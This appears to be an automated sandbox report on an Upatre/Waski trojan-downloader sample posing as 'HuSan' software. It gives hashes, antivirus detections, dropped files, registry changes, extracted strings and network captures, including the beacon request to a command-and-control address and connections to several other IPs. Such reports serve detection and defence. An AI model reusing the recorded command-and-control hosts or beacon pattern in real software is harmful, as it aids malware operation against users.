Analysis Date2015-08-27 00:01:51
MD5e1adf1cd7567620f10014602962e750b
SHA120e83da606ec616a8223ef28ea5b90142104dea9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 674bac775a5a10b2bf306ddc5f445ddc sha1: be6ef9bcc7683ef9738fd0e122eb04115593fbbc size: 8192
Section.rdata md5: 6668bae049f4d95f3c272bf8089967af sha1: 381e16ecf6478c6fe79a964c31a0180dcbc5abc9 size: 3072
Section.data md5: 2eab3395cdbb85cd76bf76bcfc3a348b sha1: 75e035b13332c8647fbdc924329b785052ff8d32 size: 4096
Section.rsrc md5: b243e81cda56ac60429400c653f848a8 sha1: 837bd547e0533f585af4afbb5b80878e761c160d size: 19456
Timestamp2091-10-15 15:08:47
VersionLegalCopyright: В©Huan and Sanches Mortales; available under the MPL license.
InternalName: Huan and Sanches
FileVersion: 2.0.1
CompanyName: HuSan Corporation
BuildID: ª»ÌÝîÿÿîÝÌ»ªD
LegalTrademarks: HuSan is a Trademark of The Huan and Sanches Mortales.
Comments:
ProductName: HuSan
ProductVersion: 2.0.1
FileDescription: HuSan
OriginalFilename: husan.exe
PackerMicrosoft Visual C 2.0
PEhash9655f13429d13949e153bdb8855c1c06f93f411b
IMPhash10dc261d9f8903fde964cc27f4902b93
AVCA (E-Trust Ino)no_virus
AVF-SecureTrojan.Upatre.Gen.3
AVDr. WebTrojan.Upatre.504
AVClamAVno_virus
AVArcabit (arcavir)Trojan.Upatre.Gen.3
AVBullGuardTrojan.Upatre.Gen.3
AVPadvishno_virus
AVVirusBlokAda (vba32)TrojanDownloader.Upatre
AVCAT (quickheal)Trojan.Kadena.B4
AVTrend MicroTROJ_UP.70E37AF8
AVKasperskyTrojan-Downloader.Win32.Upatre.fis
AVZillya!no_virus
AVEmsisoftTrojan.Upatre.Gen.3
AVIkarusTrojan-Downloader.Win32.Waski
AVFrisk (f-prot)W32/Trojan3.PET
AVAuthentiumW32/Trojan.XDCK-0102
AVMalwareBytesTrojan.Upatre.VM3
AVMicroWorld (escan)Trojan.Upatre.Gen.3
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre.BC
AVK7Trojan ( 004c16241 )
AVBitDefenderTrojan.Upatre.Gen.3
AVFortinetW32/Waski.A!tr
AVSymantecDownloader.Upatre!gen5
AVGrisoft (avg)Generic_s.EON
AVEset (nod32)Win32/TrojanDownloader.Waski.A
AVAlwil (avast)Crypt-SAL [Trj]
AVAd-AwareTrojan.Upatre.Gen.3
AVTwisterTrojanDldr.Upatre.fis.gmcl
AVAvira (antivir)TR/Injector.frta
AVMcafeeDownloader-FASG!E1ADF1CD7567
AVRisingTrojan.Win32.Kryptik.af

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\gunshum.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\SHUMCB2B.tmp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\gunshum.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\gunshum.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\malware.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS46.16.225.236
Winsock DNS81.7.109.65
Winsock DNS145.255.5.178
Winsock DNS85.248.2.228
Winsock DNS95.80.123.41
Winsock DNS91.240.97.54
Winsock DNS128.0.85.11
Winsock DNS46.151.130.90
Winsock DNSicanhazip.com

Network Details:

DNSicanhazip.com
Type: A
104.238.136.31
DNSicanhazip.com
Type: A
104.238.145.30
DNSicanhazip.com
Type: A
104.238.141.75
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
HTTP GEThttp://81.7.109.65:13392/WAK22/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1)
Flows TCP192.168.1.1:1031 ➝ 104.238.136.31:80
Flows TCP192.168.1.1:1032 ➝ 81.7.109.65:13392
Flows TCP192.168.1.1:1033 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1034 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1035 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1036 ➝ 85.248.2.228:443
Flows TCP192.168.1.1:1037 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1038 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1039 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1040 ➝ 95.80.123.41:443
Flows TCP192.168.1.1:1041 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1042 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1043 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1044 ➝ 91.240.97.54:443
Flows TCP192.168.1.1:1045 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1046 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1047 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1048 ➝ 46.151.130.90:443
Flows TCP192.168.1.1:1049 ➝ 145.255.5.178:443
Flows TCP192.168.1.1:1050 ➝ 145.255.5.178:443
Flows TCP192.168.1.1:1051 ➝ 145.255.5.178:443
Flows TCP192.168.1.1:1052 ➝ 145.255.5.178:443
Flows TCP192.168.1.1:1053 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1054 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1055 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1056 ➝ 46.16.225.236:443
Flows TCP192.168.1.1:1057 ➝ 128.0.85.11:443
Flows TCP192.168.1.1:1058 ➝ 128.0.85.11:443

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e31290d 0a486f73 743a2069   NT 6.1)..Host: i
0x00000060 (00096)   63616e68 617a6970 2e636f6d 0d0a4361   canhazip.com..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f57414b 32322f43 4f4d5055   GET /WAK22/COMPU
0x00000010 (00016)   5445522d 58585858 58582f30 2f35312d   TER-XXXXXX/0/51-
0x00000020 (00032)   5350332f 302f2048 5454502f 312e310d   SP3/0/ HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000040 (00064)   696c6c61 2f352e30 20285769 6e646f77   illa/5.0 (Window
0x00000050 (00080)   73204e54 20362e31 290d0a48 6f73743a   s NT 6.1)..Host:
0x00000060 (00096)   2038312e 372e3130 392e3635 3a313333    81.7.109.65:133
0x00000070 (00112)   39320d0a 43616368 652d436f 6e74726f   92..Cache-Contro
0x00000080 (00128)   6c3a206e 6f2d6361 6368650d 0a0d0a     l: no-cache....

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings
2.0.1
A00009C0
Append
biMainClass
BuildID
button
Comments
CompanyName
Download
edit
Erase
FileDescription
FileVersion
Huan and Sanches
Huan and Sanches Mortales; available under the MPL license.
HuSan
HuSan Corporation
husan.exe
HuSan is a Trademark of The Huan and Sanches Mortales.
iMainWindow
InternalName
jjjh
LegalCopyright
LegalTrademarks
Megator
MinimalizeClassex
OriginalFilename
PadesoftApplication
ProductName
ProductVersion
QUIT
riched32.DLL
richedit
SaveAs
static
StringFileInfo
Translation
Upload
VarFileInfo
VS_VERSION_INFO
-%&++(
,,&#*+$(+
0JBFCP:
0N($6B$
(0#P	FNN
%"1>/+
1*?OH&0*&H
2?1>/9
27	7"FC
2D#..J
 +2EH-
;38C!<M
(3JD74
4'09)"
/5@$0O/
	,$5%34
.!6&0!&
.$66*5.&6
<6+A$>
6I1D3&&MC
!6MAK&
@%7FGP"?
7H)8!0
:7-I4N/1
>7,>JL37E
8)I% GF
8JNAO(
<8K58.
9@11% 
(>9B@7.
9(L%C6>4
-:A'7$#
AB9?L?7
_acmdln_dll
B.9+9F6
"C50><
CloseHandle
_commode_dll
CopyFileA
CreateFileW
CreateWindowExW
CRTDLL.dll
@.data
DefWindowProcW
DialogBoxParamW
D&IC61
DispatchMessageW
D>KLM?
DLEB=J
>E)4N,
E;G8P4
EndDialog
%F; /	
F%1K!'M
_fmode_dll
G@ 06BA
?G'#7>
)G$$*AC!
GetClientRect
GetCurrentDirectoryW
GetLastError
__GetMainArgs
GetMessageW
GetModuleHandleA
GetStartupInfoA
G)J8N2>
_global_unwind2
G,)O&? 
HN$.F5'
HO +G+
I1CO(H	C7
#I4GB.
%&I?5*
I$+58'
_initterm
KB>+ 7,2<%E%I
,K*EEF1
KERNEL32.dll
+KI/ L
)L%)B7N'
'&LEBDL
LoadAcceleratorsW
LoadCursorW
LoadIconW
LoadLibraryW
LoadStringW
_local_unwind2
,M4,!M#!0L
MA*1& 
ML"HB7
ND9./2&
N H&1K:$;3
=O&*%A
OBL$JAL
OG7?/8
 **P)2'	H
P9! =7
PathCompactPathExW
PathFileExistsW
PathFindExtensionW
PathFindFileNameW
PathIsDirectoryW
PathMatchSpecW
P@F2=-
P:$IH	C
PostQuitMessage
%@%PP?#,C
)pw*P6?G9A
q9/&a8'
`.rdata
ReadFile
RegisterClassExW
SendMessageW
SetFileAttributesA
SetWindowTextW
SHLWAPI.dll
ShowWindow
T6'>yL
!This program cannot be run in DOS mode.
TranslateMessage
u8- l80!h80
UpdateWindow
USER32.dll
VC20XC00U
=+w%/.[96
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security>    <requestedPrivileges>     <requestedExecutionLevel  level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>